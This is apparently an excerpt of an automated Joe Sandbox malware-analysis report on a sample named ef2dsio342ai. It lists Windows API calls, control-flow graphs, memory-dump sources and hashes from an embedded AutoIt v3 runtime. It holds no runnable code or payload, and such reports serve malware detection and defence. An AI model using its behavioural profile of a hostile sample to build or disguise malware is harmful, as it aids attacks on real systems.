                                                                                                      • Instruction Fuzzy Hash: 23C1D3B5E043499FCF11DFA9C855BAEFBB4AF0A310F180199E854AB3A2C7349941CB75
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1056 1000dfe3-1000dfed call 1000aa40 1059 1000dff4-1000e003 call 10013a8b 1056->1059 1060 1000dfef-1000dff3 1056->1060 1063 1000e055 1059->1063 1064 1000e005-1000e00d 1059->1064 1065 1000e057-1000e077 call 10013a05 1063->1065 1066 1000e018-1000e01b 1064->1066 1067 1000e00f-1000e016 1064->1067 1075 1000e085 1065->1075 1076 1000e079-1000e083 call 100088f0 1065->1076 1070 1000e039-1000e049 call 10013a8b FindCloseChangeNotification 1066->1070 1071 1000e01d-1000e021 1066->1071 1067->1066 1069 1000e023-1000e037 call 10013a8b * 2 1067->1069 1069->1063 1069->1070 1070->1063 1079 1000e04b-1000e053 GetLastError 1070->1079 1071->1069 1071->1070 1081 1000e087-1000e08a 1075->1081 1076->1081 1079->1065
                                                                                                      APIs
                                                                                                      • __ioinit.LIBCMT ref: 1000DFE6
                                                                                                        • Part of subcall function 1000AA40: InitOnceExecuteOnce.KERNEL32(100240A4,1000AA7B,00000000,00000000,1001601C,00000109), ref: 1000AA4E
                                                                                                      • __get_osfhandle.LIBCMT ref: 1000DFFA
                                                                                                      • __get_osfhandle.LIBCMT ref: 1000E025
                                                                                                      • __get_osfhandle.LIBCMT ref: 1000E02E
                                                                                                      • __get_osfhandle.LIBCMT ref: 1000E03A
                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,100163EF,?,?,?,?,?,?,?,?,10001B79,00000000,00000109), ref: 1000E041
                                                                                                      • GetLastError.KERNEL32(?,100163EF,?,?,?,?,?,?,?,?,10001B79,00000000,00000109), ref: 1000E04B
                                                                                                      • __free_osfhnd.LIBCMT ref: 1000E058
                                                                                                      • __dosmaperr.LIBCMT ref: 1000E07A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __get_osfhandle$Once$ChangeCloseErrorExecuteFindInitLastNotification__dosmaperr__free_osfhnd__ioinit
                                                                                                      • String ID:
                                                                                                      • API String ID: 1233217581-0
                                                                                                      • Opcode ID: b63bf5ccbfcc3d76145af8e46c8cba29e7ab5c552405c5e43e96bae6e5cafa23
                                                                                                      • Instruction ID: 4a5f6a91746194122aa1fb644680774bd96d0f2c1de48e08e235d2cb749649a7
                                                                                                      • Opcode Fuzzy Hash: b63bf5ccbfcc3d76145af8e46c8cba29e7ab5c552405c5e43e96bae6e5cafa23
                                                                                                      • Instruction Fuzzy Hash: B4112536A006E005F210D2345D4972F27C8CF81BF5F66839EF968AA0DAEFB4ECC24151
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1106 d1353a-d135aa CreateWindowExW * 2 ShowWindow * 2
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D13568
                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D13589
                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D132EF,?), ref: 00D1359D
                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D132EF,?), ref: 00D135A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateShow
                                                                                                      • String ID: AutoIt v3$edit
                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                      • Opcode ID: 5118f82379396e657ab188f49d2e6e7632c637fc884c3f0cb9341db40e8d59b2
                                                                                                      • Instruction ID: a95addb9d3dce6d0e13d1e7e4dd93856e2248efcc7d798e61d3ebbb6b86daf2b
                                                                                                      • Opcode Fuzzy Hash: 5118f82379396e657ab188f49d2e6e7632c637fc884c3f0cb9341db40e8d59b2
                                                                                                      • Instruction Fuzzy Hash: 4CF0B7716403D47AE72567576C88E373EBED7C7F50B00001EB905EA6A0D6691855DEB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D55110
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D16049
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                      • API String ID: 2289894680-4094128768
                                                                                                      • Opcode ID: edc62e3233f29f963b4c58da9b7714ac98228649afa5068d59111ad98778919e
                                                                                                      • Instruction ID: ca7096adc3202332aea944e10fd7f04575f0ef221774d8ea25c44961a31c0355
                                                                                                      • Opcode Fuzzy Hash: edc62e3233f29f963b4c58da9b7714ac98228649afa5068d59111ad98778919e
                                                                                                      • Instruction Fuzzy Hash: 24419071008744AAC711EB60EC81AEF77ACEF84320F04491AF489961A1EF74D689CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D155EB,SwapMouseButtons,00000004,?), ref: 00D1561C
                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D155EB,SwapMouseButtons,00000004,?), ref: 00D1563D
                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D155EB,SwapMouseButtons,00000004,?), ref: 00D1565F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: Control Panel\Mouse
                                                                                                      • API String ID: 3677997916-824357125
                                                                                                      • Opcode ID: 4a9442e6ef86cdf9d1ff12f616d8b6919564d6910c17e411e32edbf8318cd27c
                                                                                                      • Instruction ID: 7ab6ce463eac80e79e75840a41d4c8d21e1cfe4b9f103c612a04f87a17cc9ea3
                                                                                                      • Opcode Fuzzy Hash: 4a9442e6ef86cdf9d1ff12f616d8b6919564d6910c17e411e32edbf8318cd27c
                                                                                                      • Instruction Fuzzy Hash: 00115AB1610608FFDB208F64EC40DEFB7B8EF41744B444469F806D7228EA719E8097B4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • Variable must be of type 'Object'., xrefs: 00D6486A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                      • API String ID: 0-109567571
                                                                                                      • Opcode ID: fa9aeb9d38a5c85c1cddef0218643f591fbacadffd485d147acc89f5cea5b7c3
                                                                                                      • Instruction ID: 0ffdc3f854472cf80dbe2bd6c54039a5f2136a6c4f9b3f2c796a20b6a534e381
                                                                                                      • Opcode Fuzzy Hash: fa9aeb9d38a5c85c1cddef0218643f591fbacadffd485d147acc89f5cea5b7c3
                                                                                                      • Instruction Fuzzy Hash: E7C27E71A00214EFCB24DF98E890AADB7B1FF15314F288169E945AB351DB75ED81CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __Init_thread_footer.LIBCMT ref: 00D215A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1385522511-0
                                                                                                      • Opcode ID: 3a1486f8a92c85a8a70d63f88bb8f44745a3d66be74e0f68e9b418c3ee703b82
                                                                                                      • Instruction ID: 778954100af48a9b35288c007d5e949d694537be24d84d57df9dfdb24799c8cb
                                                                                                      • Opcode Fuzzy Hash: 3a1486f8a92c85a8a70d63f88bb8f44745a3d66be74e0f68e9b418c3ee703b82
                                                                                                      • Instruction Fuzzy Hash: C1B25A74608350CFDB24DF18D480A2ABBE1BFA9318F18895DE9858B352D771ED45CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00D309F8
                                                                                                        • Part of subcall function 00D33634: RaiseException.KERNEL32(?,?,?,00D30A1A,?,00000000,?,?,?,?,?,?,00D30A1A,00000000,00DD9758,00000000), ref: 00D33694
                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00D30A15
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3476068407-410509341
                                                                                                      • Opcode ID: 11f7b1af85599c9541cc1d54558a46d7be9e312da15c790632dca60bc9c2f57b
                                                                                                      • Instruction ID: 16f2bd7d0baf7b69880ba8c24a0bcd5c8487416a05a4a76aa86c05a14f802c2a
                                                                                                      • Opcode Fuzzy Hash: 11f7b1af85599c9541cc1d54558a46d7be9e312da15c790632dca60bc9c2f57b
                                                                                                      • Instruction Fuzzy Hash: 8AF09C3450030DBB8B04BA74EC66A9EBF7C9E00760F544121B914D65E2EB71DE56C5F0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00D98C52
                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00D98C59
                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00D98E3A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 146820519-0
                                                                                                      • Opcode ID: 10597ef9117676feff3a211b7d03558c708cda5c6ab1665c18c63fdb3d8d9533
                                                                                                      • Instruction ID: cb94758dd8f881a83c6c4d7c7febf72857182ffe2a1e876264be815b2898192e
                                                                                                      • Opcode Fuzzy Hash: 10597ef9117676feff3a211b7d03558c708cda5c6ab1665c18c63fdb3d8d9533
                                                                                                      • Instruction Fuzzy Hash: BF126B71A083409FCB14DF28C494B6ABBE5FF85714F18895DF8898B252CB31E945CFA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D13205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D13236
                                                                                                        • Part of subcall function 00D13205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D1323E
                                                                                                        • Part of subcall function 00D13205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D13249
                                                                                                        • Part of subcall function 00D13205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D13254
                                                                                                        • Part of subcall function 00D13205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D1325C
                                                                                                        • Part of subcall function 00D13205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D13264
                                                                                                        • Part of subcall function 00D1318C: RegisterWindowMessageW.USER32(00000004,?,00D12906), ref: 00D131E4
                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D129AC
                                                                                                      • OleInitialize.OLE32 ref: 00D129CA
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00D539E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1986988660-0
                                                                                                      • Opcode ID: c1f992a80a60fffda6506adb5df4e8f0c077ea8ed9e12ec9b287724aec970528
                                                                                                      • Instruction ID: 5f0ef17561d2aaf9285f99ed66f82cea7366846dace8a02219f6e6864defcc18
                                                                                                      • Opcode Fuzzy Hash: c1f992a80a60fffda6506adb5df4e8f0c077ea8ed9e12ec9b287724aec970528
                                                                                                      • Instruction Fuzzy Hash: F1717CB09013C49EC389FF79AEE56763AE9FB59314340812AD409CB3A1EBB08585CF75
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D15F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D16049
                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00D2FD44
                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D2FD53
                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D6FDD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                      • String ID:
                                                                                                      • API String ID: 3500052701-0
                                                                                                      • Opcode ID: 1c26224b397236d050b150949b3e3bc57fcdda0d3a7eeffddc346c70dfbe8164
                                                                                                      • Instruction ID: 1d166552fe42d6c3096cfabac3e814d180ad49878d41379958ab907e7e1f9f5b
                                                                                                      • Opcode Fuzzy Hash: 1c26224b397236d050b150949b3e3bc57fcdda0d3a7eeffddc346c70dfbe8164
                                                                                                      • Instruction Fuzzy Hash: EC31A771904754AFEB22CF249885BE7BBEC9F16308F0404AEE5DA97241C7746A85CF71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00D4895C,?,00DD9CE8,0000000C), ref: 00D48A94
                                                                                                      • GetLastError.KERNEL32(?,00D4895C,?,00DD9CE8,0000000C), ref: 00D48A9E
                                                                                                      • __dosmaperr.LIBCMT ref: 00D48AC9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 490808831-0
                                                                                                      • Opcode ID: fef337dce01a25cfaa8e885e5307add7dc79a5dbc1ae7879d06c5c2630a46a38
                                                                                                      • Instruction ID: 22970054b17904aef8e212dacd857ec4d5bb565d2bda71814c8b2a0922be5dc3
                                                                                                      • Opcode Fuzzy Hash: fef337dce01a25cfaa8e885e5307add7dc79a5dbc1ae7879d06c5c2630a46a38
                                                                                                      • Instruction Fuzzy Hash: CF012F3360566457D7246334688777E67468B817B4F2D061BF815DB1D3DEA0CCC563B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00D497CA,FF8BC369,00000000,00000002,00000000), ref: 00D49754
                                                                                                      • GetLastError.KERNEL32(?,00D497CA,FF8BC369,00000000,00000002,00000000,?,00D45EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00D36F61), ref: 00D4975E
                                                                                                      • __dosmaperr.LIBCMT ref: 00D49765
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2336955059-0
                                                                                                      • Opcode ID: 4e93a9d2796899a8e842981a18df8be285ccacff9a44e1d18e205477ad0b3521
                                                                                                      • Instruction ID: 6fdd9cd4780c027796a7861d71e3561c6ad9feef8aff5140842089de461b1b92
                                                                                                      • Opcode Fuzzy Hash: 4e93a9d2796899a8e842981a18df8be285ccacff9a44e1d18e205477ad0b3521
                                                                                                      • Instruction Fuzzy Hash: BE01F037A20618ABCB059F96DC55C5F772ADF85330B280255F815DB291E671DD4187B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00D4D1E4
                                                                                                      • _free.LIBCMT ref: 00D4D21D
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4D224
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2716640707-0
                                                                                                      • Opcode ID: 58f808cdba67153a43169a359246c05cfaa6ccd0a297bcefe40a1fcf28a14849
                                                                                                      • Instruction ID: 1883e467de6ff70ae43bb1718a964e986f139131e1a124976c3ad8c97d98da98
                                                                                                      • Opcode Fuzzy Hash: 58f808cdba67153a43169a359246c05cfaa6ccd0a297bcefe40a1fcf28a14849
                                                                                                      • Instruction Fuzzy Hash: 41E02B375046112B921232297C89E7F3A2EEFC37B07190115F404C6241EF50CD0240F1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___copy_path_to_wide_string__wsopen_nolock_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1272159912-0
                                                                                                      • Opcode ID: c9bf6c1ae0cd87c47a76a94545576dbfa2fcd4038739583245f79c61ca19616d
                                                                                                      • Instruction ID: 2e7a7aaed26eefc0d2fbf46f3aedc1f864bb9e3eb734c5aa27705e7c5064d900
